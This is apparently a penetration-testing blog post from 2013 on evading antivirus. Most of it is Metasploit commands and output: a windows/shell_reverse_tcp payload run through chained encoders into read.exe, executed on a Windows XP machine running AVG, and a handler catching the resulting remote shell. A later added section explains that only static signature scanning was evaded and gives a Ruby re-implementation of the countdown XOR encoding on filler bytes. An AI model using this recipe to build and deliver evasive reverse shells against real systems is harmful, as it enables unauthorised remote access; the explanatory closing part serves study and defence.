root@bt:~# time msfpayload windows/shell_reverse_tcp lhost=192.168.1.11 lport=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 966 (iteration=1)
[*] x86/alpha_upper succeeded with size (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)
[*] x86/countdown succeeded with size 2163 (iteration=1)
[*] x86/countdown succeeded with size 2181 (iteration=2)
[*] x86/countdown succeeded with size 2199 (iteration=3)
[*] x86/countdown succeeded with size 2217 (iteration=4)
[*] x86/countdown succeeded with size 2235 (iteration=5)

real    1m33.468s
user    0m52.195s
sys     0m39.830s
root@bt:~#
Upload read.exe to the XP machine and run it from cmd.exe. The antivirus software does not report a threat:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd ..

C:\Documents and Settings>cd ..

C:\>read.exe
Then, on the attacker machine, start the handler for the reverse shell:
root@bt:~# msfcli exploit/multi/handler payload=windows/shell_reverse_tcp lhost=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3052-FA52

 Directory of C:\

2012-03-24  11:55                 0 AUTOEXEC.BAT
2013-04-28  16:06       131,820,480 avg_free_x86_all_2013.exe
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-04-28  17:08    <DIR>          Program Files
2013-04-29  22:17            73,802 read.exe
2013-04-28  21:37                38 readme.txt
2013-04-28  15:19    <DIR>          Ruby
2013-04-28  20:45    <DIR>          WINDOWS
               5 File(s)    131,894,320 bytes
               4 Dir(s)   5,329,256,448 bytes free

C:\>
This gives a remote shell on the XP box without "disturbing" AVG (the AVG Free 2013 installer, avg_free_x86_all_2013.exe, is visible in the listing, so that is the product being evaded). Keep in mind what was actually evaded: a static, signature-based scan of a file on disk by a 2013 product on the date shown. The encoder chain only transforms the payload bytes and prepends decoder stubs; it does not change what the payload does once it runs, so a behavioural or emulating engine, or simply a signature for the well-known shikata_ga_nai and countdown decoder stubs, still catches it.
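To make concrete what the msfencode stages at the top of the post do to the payload, here is an added example in Ruby (Metasploit's own language). It is not code from the original post or from Metasploit: it re-implements the byte transform behind the x86/countdown encoder used in the last stage, applies it for several iterations the way "-c 5" does, and runs a naive static signature check before and after. Assumptions: the keystream is (index + 1) & 0xff, which is my reading of the countdown decoder loop ("xor [esi+ecx+7], cl" with ecx counting down from the payload length); the real 18-byte x86 decoder stub is not reproduced, a NOP placeholder of the same length stands in for it (the output above shows countdown growing the buffer by exactly 18 bytes per iteration); and the sample payload is constructed filler around the LHOST and LPORT bytes, not real shellcode.

```ruby
# Added example, not from the original post or from Metasploit.
# Re-implements the x86/countdown byte transform with a placeholder stub
# to show what an encoder iteration does and why a static signature
# stops matching. See the lead-in for the assumptions made.

STUB_LEN = 18                              # countdown adds 18 bytes per iteration
STUB_PLACEHOLDER = ("\x90" * STUB_LEN).b   # placeholder only, NOT the real decoder stub

# One countdown layer: payload byte i is XORed with (i + 1) & 0xff
# (assumed keystream), then the decoder stub is prepended.
def countdown_encode(buf)
  body = buf.bytes.each_with_index.map { |b, i| b ^ ((i + 1) & 0xff) }
  STUB_PLACEHOLDER + body.pack('C*')
end

# Undo one layer: drop the stub and apply the same keystream again
# (XOR with the same key is its own inverse).
def countdown_decode(buf)
  body = buf.byteslice(STUB_LEN..-1)
  body.bytes.each_with_index.map { |b, i| b ^ ((i + 1) & 0xff) }.pack('C*')
end

# "-c n": every iteration wraps the previous output, stub included,
# in a fresh layer, which is why the size grows by STUB_LEN each time.
def encode_iterations(buf, n)
  n.times.reduce(buf) { |acc, _| countdown_encode(acc) }
end

def decode_iterations(buf, n)
  n.times.reduce(buf) { |acc, _| countdown_decode(acc) }
end

# The kind of check a static signature scanner makes: is the byte
# pattern present verbatim anywhere in the buffer?
def signature_hit?(buf, sig)
  !buf.b.index(sig.b).nil?
end

# Constructed sample payload (not real shellcode): two filler bytes, the
# attacker address and port as windows/shell_reverse_tcp embeds them
# (LHOST as 4 raw bytes, LPORT big-endian), two more filler bytes.
LHOST_BYTES = [192, 168, 1, 11].pack('C4')
LPORT_BYTES = [31337].pack('n')
SAMPLE_PAYLOAD = [0x31, 0xc9].pack('C*') + LHOST_BYTES + LPORT_BYTES + [0xff, 0xd5].pack('C*')

if __FILE__ == $PROGRAM_NAME
  encoded = encode_iterations(SAMPLE_PAYLOAD, 5)
  puts "plain: #{SAMPLE_PAYLOAD.bytesize} bytes, after 5 iterations: #{encoded.bytesize} bytes"
  puts "LHOST bytes visible in plain payload: #{signature_hit?(SAMPLE_PAYLOAD, LHOST_BYTES)}"
  puts "LHOST bytes visible after encoding:   #{signature_hit?(encoded, LHOST_BYTES)}"
  puts "decoding restores the original:       #{decode_iterations(encoded, 5) == SAMPLE_PAYLOAD}"
end
```

The point to take from it: the LHOST bytes that a scanner could match in the plain payload are gone from the encoded bytes, yet nothing about the payload has changed; peeling the layers off in the same order the decoder stubs would at run time gives back the original, which is exactly what an emulating engine does.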